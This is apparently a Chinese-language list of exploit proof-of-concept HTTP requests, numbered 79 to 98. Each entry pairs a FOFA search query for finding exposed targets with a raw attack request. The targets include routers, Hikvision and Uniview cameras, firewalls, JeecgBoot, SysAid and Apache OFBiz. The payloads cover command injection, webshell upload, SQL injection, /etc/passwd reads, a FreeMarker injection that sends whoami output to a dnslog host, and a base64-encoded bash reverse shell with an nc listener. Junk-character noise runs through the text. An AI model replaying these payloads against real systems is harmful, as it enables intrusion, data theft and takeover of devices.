------YsOxWxSvj1KyZow1PTsh98fdu6l--6 Q& f) t' F# k* k
( V$ {" ?& b# f* v5 C) I& b1 s, C/ @/ _
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
8 g) F+ q: D/ ]2 yHost: x.x.x.x
8 l9 {* j3 G0 _" Z0 X* \! E9 c
/ x; p# Z9 h ^/ o+ o! ]
7 h5 K5 F/ _; u- N79. BYTEVALUE 百为流控路由器远程命令执行
$ g* Y/ J: e8 J3 \6 }& xFOFA:BYTEVALUE 智能流控路由器2 b2 k5 ^6 Q8 I5 U& H8 Z7 }- K
GET /goform/webRead/open/?path=|id HTTP/1.11 A1 [& q& J1 ^! k! H ~! E6 }
Host:IP
7 K5 K+ `1 H$ w- E1 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
; R9 [: j" y8 W. p4 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ v' A- m3 V) sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* ^# S$ E& D- U* ~$ l) T3 t
Accept-Encoding: gzip, deflate
6 b! v: P) Q( V5 s5 N3 mConnection: close
, p4 R d0 {" eUpgrade-Insecure-Requests: 19 v- r* R! M/ h$ V7 Q
Q- ]* Y3 n8 Y+ D2 Y i+ y% l
& u/ f4 z3 y( x% K; U80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传7 x& T7 i8 `9 T, ]7 ^2 C
FOFA:app="速达软件-公司产品"
' Q/ J' d2 m+ W* T+ dPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
2 P) ?* D' S. z* [, _Host: x.x.x.x
+ A. y; Z/ F, m$ KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 R( s }+ O7 M5 u& K& ^
Content-Length: 27
3 Z" J7 s E" l q- u) N8 l! NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# p; h$ u& d. y& O' v8 F+ B
Accept-Encoding: gzip, deflate
* s/ H! o* i; x8 ?5 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' }2 F7 g( u# \$ eConnection: close
# s& j& t) h! X( t' QContent-Type: application/octet-stream
5 r$ [& Q% S$ y) b9 HUpgrade-Insecure-Requests: 1. {* H5 [" \* m3 ^6 ^7 L, n
/ \2 ]7 e& z. z, S<% out.print("oessqeonylzaf");%>
9 C J% @* `0 Z# h9 V: O- U' p; G/ w; I5 Z5 H# P# Q( q
/ S1 t& O5 `/ E; a& L7 P! o
GET /xykqmfxpoas.jsp HTTP/1.1+ r" W# X( E/ j4 ?' E: H
Host: x.x.x.x9 c) `& I9 _9 k% M" Q% b6 a* ]3 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 n7 g/ p' J3 L1 G7 t3 aConnection: close
* C; }+ H* D- U- ^8 y) fAccept-Encoding: gzip
" L+ N3 B% B/ I: r1 v5 {/ Y
! K Q# A! Y- F& n
; K( H! J# e% x7 z! C81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露7 l3 X1 e* [' r# ^ }( Q% x$ K& j
FOFA:app="uniview-视频监控"5 {' i2 _" M# Y2 m0 t0 b6 Q
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1' |& G5 i" q1 A4 J
Host: x.x.x.x
3 s% d8 r, c1 M5 D3 Q9 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 \/ W* m; d/ z5 V* T$ o
Connection: close
; ]! m0 z- d, a0 Q$ L6 {% @, JAccept-Encoding: gzip
2 C3 E, O+ {: ]7 K: P8 ~
4 x9 {+ g" D! U+ Q( T) b+ ]
5 [& x+ o) _$ `, ?4 n- I, X82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
1 m6 [& N! [( dFOFA:app="思福迪-LOGBASE"" v( v5 b# k( [' V. v
POST /bhost/test_qrcode_b HTTP/1.1
. K$ [! e+ H0 h9 ?/ K* j( wHost: BaseURL
8 b: v6 P; K$ RUser-Agent: Go-http-client/1.1
6 b0 u8 u& |( B, _4 U% [: k r$ FContent-Length: 23- ?. k5 b( `( O
Accept-Encoding: gzip
' r' k# d: k4 I4 AConnection: close
" h& ~1 n! z. Y1 {4 a/ C4 C& D) CContent-Type: application/x-www-form-urlencoded
/ \: O: |" h8 i1 p' yReferer: BaseURL9 B$ W0 D% x3 P: l
% d6 r+ d5 ?/ U [* _z1=1&z2="|id;"&z3=bhost( |* ^5 M$ H! D: b0 H
( {, k6 i9 q, ^0 b. G, M
3 y. C/ Q6 m2 }3 \- `4 d6 i: b6 A83. JeecgBoot testConnection 远程命令执行
% f0 x- o5 m* a1 e, fFOFA:title=="JeecgBoot 企业级低代码平台"
/ [. ]- S5 O7 r, M* y
' Q3 q. d& H1 ?( s, ?1 n6 M* R. ~0 e! v
POST /jmreport/testConnection HTTP/1.15 ?: C( L! K8 I" n" c9 M! t( E
Host: x.x.x.x
3 Y/ N5 x U3 f# x- q& v! B. [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 U& D8 i# \8 B& g6 Y( Y+ {+ L$ L' d
Connection: close
$ Q* E+ Y4 Y. r, {3 F5 nContent-Length: 8881; a* G1 J: |( ^9 K) Y" x
Accept-Encoding: gzip- Q% R5 x |5 \
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO", w6 _7 Y, _, `+ X
Content-Type: application/json0 d8 ?$ C; `' s
3 o: Q( H) x R$ ]PAYLOAD' A, t4 s/ a& Q* w. i/ v
0 _6 d% u/ a4 ]1 v% N# C$ d# I
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入4 X4 ~$ i8 i$ i1 Q+ \* N5 l: a
FOFA:title=="JeecgBoot 企业级低代码平台"# k/ r1 D( _- p9 [1 ~& w
! K3 A& [6 |. V( q
* v6 B. r6 F4 Y0 r: y m6 }
" z/ c9 J7 S$ FPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
# ]% I) ?5 N% L6 s3 F mHost: 192.168.40.130:80807 e& ^3 I, [+ C1 _' b+ P7 M; @
User-Agent: curl/7.88.17 Q6 O, f4 S5 S
Content-Length: 1563 j2 T" x6 A5 x M' W
Accept: */*$ ^1 Q: {- f" Y. b5 p8 B
Connection: close
9 o% H8 v' c8 h" MContent-Type: application/json
5 G% e* a" K$ o% M7 w: L; A- FAccept-Encoding: gzip
2 f A- `4 G9 ~+ Q6 B& }+ [- n) p
+ r5 k0 {4 U1 ^& M{3 M- E0 L: A" l( [
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",: ^, H3 A, ?& r) A/ [* w" Y
"type": "0"
f9 K! P6 H0 ]: l. }}
( e7 p/ Q0 s l$ ]
. T) w2 H, z0 X' @# Q. x! O6 _- O2 J- [ I# x3 `
85. SysAid On-premise< 23.3.36远程代码执行; Z4 S. \0 F. a; p4 q! X
CVE-2023-47246& [2 x( H3 ^" z# d) F! Z, {, D
FOFA:body="sysaid-logo-dark-green.png" # o* M, A* Q. C) T a* E
EXP数据包如下,注入哥斯拉马
. f7 a- r; z' f2 i: ePOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
/ y3 v' s; G$ ?7 r1 DHost: x.x.x.x
. Z1 p8 f1 x4 ^5 H' b0 M& xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% \- K9 K% @) _Content-Type: application/octet-stream) U5 m: i* P* R/ t
Accept-Encoding: gzip) `+ r/ y6 E6 K! z& Q
2 |8 n4 c0 C- h% p; DPAYLOAD" x! X# l6 |, h
! c; b; J+ g* U0 O/ Y
回显URL:http://x.x.x.x/userfiles/index.jsp
3 Z8 v0 M9 h. l5 a. J
- P9 E. l" O6 i( @5 c2 X3 T( O86. 日本tosei自助洗衣机RCE. `( s3 h: ]5 v; u% b7 i4 `
FOFA:body="tosei_login_check.php"' p. T9 T2 F) N4 J% E/ Q
POST /cgi-bin/network_test.php HTTP/1.1
" `% f, M7 Q. R b- t0 ?Host: x.x.x.x/ R0 [: }( U: v
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.366 T4 r" m, @) C4 F
Connection: close9 J6 J Z( q& W! s
Content-Length: 444 ~$ E s* u) C4 X# ?/ I
Accept: */*
) B% Q! X1 Q3 {2 Z% e5 ?Accept-Encoding: gzip
2 t5 L) b& h; CAccept-Language: en5 B' M! Q9 k1 @$ T% e; B
Content-Type: application/x-www-form-urlencoded& E" p6 i" k( r1 O6 \; C4 t
4 g) R6 h0 ~" Q5 ?0 A' ^7 Chost=%0acat${IFS}/etc/passwd%0a&command=ping6 E2 V. P% r7 q3 s/ d7 M; j
) o. U2 g+ |9 n$ X9 F2 @/ K
+ _- V; \3 \+ {87. 安恒明御安全网关aaa_local_web_preview文件上传
- j1 {, E3 j" D5 b+ {8 jFOFA:title="明御安全网关"
7 o8 ~8 X, N% p b2 l, ?POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1! y% k/ u. f$ f; U4 K3 g; I
Host: X.X.X.X( L+ `- t9 E# ~% w; o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 T9 @3 t' T* G0 E5 e: D& `* D |Connection: close
! P [# X( g4 f Z7 i' rContent-Length: 1988 V% J8 u, G, U
Accept-Encoding: gzip
, E9 t& P/ `& lContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
t; p3 v+ T# B; z8 \, M' W0 C# Y! p- i/ R
--qqobiandqgawlxodfiisporjwravxtvd
5 o3 }1 F, Y% t) g2 DContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
8 d$ W& N# I! { _Content-Type: text/plain
4 J h1 Y+ A. Y# f, {2 u
* W5 F3 P' P' ]4 U2ZqGNnsjzzU2GBBPyd8AIA7QlDq
0 p8 _$ y! q/ ?, r$ D, z--qqobiandqgawlxodfiisporjwravxtvd--1 L% ?( C, [2 F% m4 D
" H! S- g: I4 f f; N3 W
x. D; ^0 Z5 W. w: M7 m0 W
/jfhatuwe.php' |' G+ r$ ]& k. _ F
0 m' x9 O$ u% H! m: _" R. [
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行2 v5 k- ?, o( B% n7 e8 ?
FOFA:title="明御安全网关"& ?- W8 _0 `9 w- W
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1' ]" |; Q/ ^7 F/ N
Host: x.x.x.xx.x.x.x
+ ~& C! U( u! [( R4 J( w6 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
H4 n+ |: w2 @$ \3 r* m+ {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: }7 p1 \) `0 [
Accept-Encoding: gzip, deflate
. A" f u1 f/ ?! ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" {. z/ w, X: } }+ ~5 s% U! [
Connection: close4 H4 B5 x1 Q- d X/ O" B/ {
" T! E- t I4 e9 P3 \% h+ F% `' d9 n$ ]/ s. m2 A$ l* _
/astdfkhl.php
: {0 \8 k% i3 }" C. j6 |, R
. d3 u, n; q5 E \. Y' A89. 致远互联FE协作办公平台editflow_manager存在sql注入4 P5 x4 N% p! i, O! v! f/ k' {! |
FOFA:title="FE协作办公平台" || body="li_plugins_download"
2 R9 T) Z& D4 Q3 s: E$ C& ?POST /sysform/003/editflow_manager.js%70 HTTP/1.18 U3 s6 u* S5 d m! d) u
Host: x.x.x.x
8 o8 n+ d$ r% FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; p1 K3 E; F! p# F9 r a
Connection: close
0 t+ ?- p. l: i$ WContent-Length: 41
/ d8 H! b: h' ^" E1 b- f+ CContent-Type: application/x-www-form-urlencoded5 D. N; J5 m3 c- z( c, `) Q( U9 ^
Accept-Encoding: gzip
! T3 S7 T$ j+ C9 I
2 v2 Z' T8 H7 V6 h Roption=2&GUID=-1'+union+select+111*222--+9 Z. p- F# R# |$ O9 h
4 e/ ?2 {* q+ B$ c0 B
1 h3 i. Q6 _& x# G. e3 d90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
6 L! n7 G0 J# S/ I7 ?FOFA:icon_hash="-1830859634"
8 Q, G& E0 k9 b- h2 xPOST /php/ping.php HTTP/1.16 K5 `; }' Z$ }8 C" Y3 [
Host: x.x.x.x
1 x9 p1 U, O. l" ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
2 o7 @, ^$ F" q. Y$ gContent-Length: 51
3 F8 @& r' ~% d2 M$ Q3 V& PAccept: application/json, text/javascript, */*; q=0.01
: Z" A$ _. Y8 ?Accept-Encoding: gzip, deflate
/ Z$ T8 A& D7 L U5 U/ i# uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# o) d" C, B' k, ~* A$ k9 VConnection: close' S3 M/ p [ S" C" O# w3 ^
Content-Type: application/x-www-form-urlencoded' J& C' z4 u" n& P1 u8 c
X-Requested-With: XMLHttpRequest
H2 v3 d* p4 F; n4 c. p, B" L7 g9 r4 r+ z
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
( R" g5 g# V9 a3 X+ R! a/ C5 V% y3 E" q9 l p& m' V7 k- ?
* D6 h, l3 F, ?4 e9 C' U91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取2 {, [* H6 q( ~
FOFA:title="综合安防管理平台"
/ s6 y/ L" q0 s `. U/ }( b1 q. Y- WGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1; S: @1 M; b. o: l, G& O- E
Host: your-ip
/ M0 [8 Q, F' WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
( a5 r3 k6 ?1 {. hAccept-Encoding: gzip, deflate
! t& t5 i0 H/ oAccept: */*( u+ \+ p" T9 W( ?+ N
Connection: keep-alive5 G! }% v: u/ Q- P0 N
7 N; Y3 ^" A$ B, l# b7 {7 d( f) R) }
; D; k, X* o. b/ N5 j92. 海康威视运行管理中心session命令执行. q% I0 b3 b9 ^! l* n
Fastjson命令执行
: }% z4 z/ ]4 Z/ S8 Z' vhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
1 p( b# Q6 _* I. sPOST /center/api/session HTTP/1.16 N, I5 e9 b' W
Host:
! \: w/ f. c# o: J( [% Y# OAccept: application/json, text/plain, */** r+ l5 w7 t4 ~9 _4 M
Accept-Encoding: gzip, deflate# S; _ J$ d3 c( w" \/ N0 B' U
X-Requested-With: XMLHttpRequest
" d/ J0 j& }; V0 V2 I+ BContent-Type: application/json;charset=UTF-8
6 i% K$ C$ s4 |& o) A, jX-Language-Type: zh_CN/ T6 U5 O7 @1 o) n
Testcmd: echo test4 @1 ^0 v. r1 @( }, @9 n5 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36( e- D F, q) @0 s' O7 n3 m
Accept-Language: zh-CN,zh;q=0.9
2 ]" b1 P* X8 n& r, bContent-Length: 5778% @5 C8 ~. Y2 l1 ?3 X
0 X0 M) ?7 ^$ S/ s/ F
PAYLOAD
% A) U- `% a2 [6 R* Z, S4 i* Z0 D8 l! v# X: |6 v; n
+ ~. }. P0 z4 r1 Z93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
' Z6 k0 p! y8 y0 q3 p* I$ W8 Q4 SFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="! r, _1 N. ?! Q( b
POST /?g=app_av_import_save HTTP/1.1
% ~. r0 y' o& W# bHost: x.x.x.x/ h; o9 A( s; p4 |' J2 d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
0 [7 Q* {: G" ^$ {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 b1 r N4 l8 |2 ]4 D
( K/ k1 z/ o& R$ ?9 l
------WebKitFormBoundarykcbkgdfx; C1 n2 g% W0 n% D; _2 c+ ]
Content-Disposition: form-data; name="MAX_FILE_SIZE") I# ~$ W* X U
. u$ ~0 I s. U8 C8 R1 I3 p d% p& d100000003 {% {7 d5 K, W+ O/ g- t
------WebKitFormBoundarykcbkgdfx- Q5 ]/ F1 L3 L5 i5 ^* `2 ~& X4 l n1 }
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
{9 A2 z. b! ^+ x @Content-Type: text/plain& P8 y/ i2 H7 \2 o
/ {: Y5 r. A6 q& Y4 ]- ?wagletqrkwrddkthtulxsqrphulnknxa
. { V5 Y- A3 D4 _( U$ b------WebKitFormBoundarykcbkgdfx
+ O5 i: O3 d" ] K" [6 C' [Content-Disposition: form-data; name="submit_post"
( ~6 T, f0 A8 s/ V4 B, k) x! t+ z- ~* ]$ i, l: |
obj_app_upfile. i8 a* q7 M: I$ s2 Y/ f$ L
------WebKitFormBoundarykcbkgdfx
! k [" C9 L' p8 \) l, F' YContent-Disposition: form-data; name="__hash__"
6 Z2 p% f* {9 p6 T3 W5 F
; v* p9 E0 n9 s0b9d6b1ab7479ab69d9f71b05e0e9445
9 z) Q8 a& ]2 [% S2 M5 V; l------WebKitFormBoundarykcbkgdfx--
5 ?: M9 O$ y! T6 g' P ^ L! R' [5 T5 k
" L! ~+ |7 } c8 u' ^6 a v, l
GET /attachements/xlskxknxa.txt HTTP/1.10 Y5 g% a) P6 l2 m/ p
Host: xx.xx.xx.xx
1 ^+ d3 y1 i& Q; p w! lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) m4 p& ] d! J: i$ Z0 b* q. M, L& a; i2 }/ F0 h# f {
+ \3 j) t; I5 G' x' c94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传" D9 K" [' O1 m# T+ H6 G
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
: _0 j& M4 r. {) D5 o- ]* |5 YPOST /?g=obj_area_import_save HTTP/1.1/ e2 y1 |# X+ y/ S
Host: x.x.x.x
* ?0 o. b5 k2 t2 ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt. P8 A |- i: H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 @. M/ h; B$ P% k
/ t/ q- p# [( ~! G1 p
------WebKitFormBoundarybqvzqvmt
5 T, L% @% z; L( M' ZContent-Disposition: form-data; name="MAX_FILE_SIZE"
" A0 f% H5 g6 r) I1 g& L \) c! \" @9 y0 O
10000000
T( v% q$ r3 _8 y9 l& H8 Y5 q9 j% O------WebKitFormBoundarybqvzqvmt
, [' v5 W& }' x, N8 p. Z" zContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"; E* I7 `) V3 V$ @1 F% x( @
Content-Type: text/plain- }. @5 y8 W5 \, X3 A9 }
4 a, G; F: L# v$ m! F2 ]+ s
pxplitttsrjnyoafavcajwkvhxindhmu' q4 z% C. X S0 P
------WebKitFormBoundarybqvzqvmt; u8 y$ u ~; y7 J! c5 A
Content-Disposition: form-data; name="submit_post"1 \. V5 M( O0 g0 P9 d8 b
& x9 M( L0 y: p; Y, z* sobj_app_upfile* U/ d9 Q8 D2 E5 w; e
------WebKitFormBoundarybqvzqvmt
5 X" O; B$ x5 X2 q! X2 l5 Z& `Content-Disposition: form-data; name="__hash__"* j5 q) i1 u/ n( R
8 e, b7 C9 t; j- K ?
0b9d6b1ab7479ab69d9f71b05e0e9445
3 {& `; ~" r+ f! p8 a------WebKitFormBoundarybqvzqvmt--& M+ |0 U$ |$ Z# y: X- K
1 v1 ~9 ] Y, N0 a- B, ]
" _3 @3 W- _- [8 K/ H- P& V
- n. L" K# Q% v( u/ l$ Z/ pGET /attachements/xlskxknxa.txt HTTP/1.1
3 \$ C& Y9 |. j, MHost: xx.xx.xx.xx' ~, a( E1 E8 |$ P9 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ l; F. q2 O. S3 g5 k
3 j% m9 o8 i+ h% C9 ?: M5 t, L
Y, f6 ~$ A' F. @) [' n5 d6 M0 V0 G# S, \, `7 N) e" ^
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
) ~$ E' {$ M! t3 F6 m3 h: r. vCVE-2023-49070
4 i: h$ T5 k/ [* f7 }- {FOFA:app="Apache_OFBiz"6 s& C; B! Y) r! r" z
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
2 O% h/ i/ [, V4 p& gHost: x.x.x.x& Q. B) t) k" l6 ^1 f) m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ U$ x7 m& p8 d+ N; g3 {Connection: close; G" A# G2 g% W @2 A7 g) [0 y; `0 s
Content-Length: 889
8 i& E9 t) c6 ~" HContent-Type: application/xml& A# w/ R' y# @4 s) s, q
Accept-Encoding: gzip2 j; d2 b( P( Y& _- N( p+ W0 z
4 @, d; A. Q `- p
<?xml version="1.0"?>
" p* w+ ]2 F4 l8 k* R y* Z<methodCall>, ^% d! F2 l+ g/ W+ _8 j5 I
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>! s0 i3 ]; A6 f j% U, r3 L7 m/ s
<params>3 y1 ^$ [- O3 c. u4 I2 O
<param>7 O4 w8 `7 O& v x0 f
<value>! a0 `4 Q+ y, U3 j w( R; ]; V
<struct>$ I/ y8 F6 q7 ?5 ^
<member>" l, x i+ z! T) H: R3 \; n+ z
<name>test</name>
5 b7 h" d1 n( Y n, n: R ] <value>
, F m+ ] @7 s p. k# j <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>% i% \6 v$ Q3 A# j3 o
</value>
# g0 H2 Z+ P% G$ Y7 Y! q# t, t; s; E; j </member>
' e' t( K* [$ k; X$ e- q </struct>
# U. p$ G+ m' q </value>2 v+ P% R6 T& q3 @2 |; {: L+ E
</param>0 d/ v5 a8 w! b1 ? n, ]4 r
</params>
+ Z. e; M7 G* J9 i1 B2 \# G</methodCall>9 L# B# S+ u9 e8 U' f( p5 d4 s
3 P$ z6 }, Z$ k% V8 e: j0 q
/ H- d, Z7 w+ W0 D+ A) M4 R+ k用ysoserial生成payload
! v' Y2 W0 ?8 H Rjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
& o! ^$ K5 a3 @8 X7 t" M; h
: @4 Q( @, A9 N' r
! t0 v$ u4 x4 Y; B( t将生成的payload替换到上面的POC
# W) {, Q: ~4 }" q/ PPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
9 V5 ]/ q2 L: {$ T/ i* XHost: 192.168.40.130:8443
0 g5 G: M1 c" C d& PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' T( `/ o% l2 X8 s jConnection: close
! n$ I& p: U& q' a. zContent-Length: 889; _# O& B; ^5 ^/ a8 H4 a7 y
Content-Type: application/xml' ?( q% q. s; p5 y. F" J# X
Accept-Encoding: gzip
+ b/ R6 b3 d' \6 @/ |& S: M2 t" B0 Z
) X1 s6 A! y3 \PAYLOAD9 ?" O* i& R: m: Q
t/ J. Q6 D6 `: J8 y( }% U
96. Apache OFBiz 18.12.11 groovy 远程代码执行
3 O$ I$ l6 g7 i4 j! J: SFOFA:app="Apache_OFBiz"* B3 l, n, P" k
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1/ p& g5 m* m9 d; ^, W1 A6 ^: s
Host: localhost:8443
: T! y% d/ t" \2 w: bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
2 S. Z0 `8 K! ]$ R0 k8 k, \ Z# QAccept: */*
* y x9 ]5 c: t l7 M8 ?. \ pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* m/ l" q/ l% n$ ^+ r: y6 oContent-Type: application/x-www-form-urlencoded
+ X9 S; Y0 f) R a+ l+ ~! ]Content-Length: 55
3 w1 p: U% W+ d, W0 O: |/ p8 m; y" x* l3 b7 `
groovyProgram=throw+new+Exception('id'.execute().text);
* L& a! ^& ~3 v. n. B7 y% R$ ~1 @! Z& Y# b9 Z1 O- \; z! X
h+ W( N4 b1 i) Z4 G1 I6 H
反弹shell
- l4 u( r7 x: y( a4 n2 T在kali上启动一个监听
/ s6 j+ c0 B* |# _" o1 Hnc -lvp 77772 \% a* Y; X) u$ F3 f
- c- |# C0 |) |7 Y. m2 _POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
7 T6 n$ } }; r- K/ tHost: 192.168.40.130:84432 V7 `: M& T2 y- D( T3 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& J q# W3 y3 dAccept: */*
: C$ d, u! ~. P2 a1 Z1 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 D- [6 Y, G6 Y% ^% C2 [$ wContent-Type: application/x-www-form-urlencoded7 s2 N" ^+ ~: S
Content-Length: 71
) n2 t9 t& I2 y7 n- h. Z+ a, j% ?0 z ]" j+ G
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();6 d4 g; R; l7 D3 M, _# C& |
5 W% M4 n3 U, T9 |6 t
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
5 M+ Q- S8 y" r# `/ j2 N9 m$ DFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"% W2 U0 ^( g$ n0 X
GET /passport/login/ HTTP/1.1
& i" ^8 a, P# ?" t% b8 i6 RHost: 192.168.40.130:8085! L4 [- j( N) Q# U$ V" B- |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ E( Z1 y3 G6 P: Z1 M5 k
Accept-Encoding: gzip
" v8 U0 S& s d. rConnection: close$ }: f* Z% R' ?: G' n
Cookie: rememberMe=PAYLOAD* e9 ^5 z, F* Y- |3 r- N
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"8 b, p+ q V4 K0 A4 U
% E; ?1 O; s9 }2 _! ^( p$ j
( z2 H$ H, b1 M! v! w98. SpiderFlow爬虫平台远程命令执行
; D& o7 Q z: B' z0 J% n% }CVE-2024-0195; |8 o; q$ |& F. Z7 z
FOFA:app="SpiderFlow"
4 J7 `8 E/ Q& j6 N( U$ d% B, e" NPOST /function/save HTTP/1.14 q% W6 G9 S- E: }
Host: 192.168.40.130:8088
7 \; f( F- j8 G w0 m" zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- w: w& k+ F2 k2 eConnection: close5 [+ u6 J# L. m4 @' P
Content-Length: 121
$ V, u+ A3 w' E2 \6 L9 s" vAccept: */*
% N; C: m3 I4 d9 z& _/ lAccept-Encoding: gzip, deflate
